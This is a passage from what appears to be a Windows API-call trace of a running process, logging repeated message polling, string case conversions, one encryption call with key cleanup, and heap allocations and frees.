lpMsg=0x8bf3c0) returned 0 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.363] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.363] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.363] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.364] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24f3fc8*, pdwDataLen=0x8bef68*=0x17c, dwBufLen=0x180 | out: pbData=0x24f3fc8*, pdwDataLen=0x8bef68*=0x180) returned 1 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.364] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.364] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.364] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.365] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.365] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.365] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.365] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.365] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.365] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.365] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.365] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.366] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.366] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.366] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.366] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.366] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.367] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.367] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.367] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0268.367] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.367] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0268.367] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.367] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.367] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.367] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.367] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.367] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.368] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0268.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.368] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0268.368] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.368] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.368] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.368] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.368] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.368] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.368] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.368] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.368] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.368] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.368] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.369] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.369] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.369] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.369] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0268.369] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.370] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0268.370] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.370] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0268.370] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.370] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.370] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0268.371] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.371] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0268.371] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.371] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.371] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.371] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.371] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.371] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.371] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.372] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.372] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.372] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.372] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0268.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.378] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0268.378] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.378] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0268.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0268.379] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.379] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.379] HeapFree (in: hHeap=0x25c0000, 